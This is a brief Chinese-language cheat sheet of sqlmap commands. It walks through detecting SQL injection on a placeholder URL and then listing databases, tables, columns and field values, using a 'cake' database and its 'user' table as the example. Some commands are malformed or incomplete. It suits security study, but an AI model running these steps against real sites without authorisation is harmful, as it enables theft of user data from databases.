sqlmap注入流程
一、判断SQL注入点
sqlmap.py -u “网址”
二、查询数据库信息
sqlmap.py -u “网址” --dbs
三、查询表的信息
通过数据库查询数据表的信息
sqlmap.py -u “网址” -D cake --tables
四、查询字段的信息
通过数据表查询字段的信息
sqlmap.py -u “网址” -D cake -T user -columns
五、通过字段查询字段的值
sqlmap.py -u “网址” -D cake -T user -C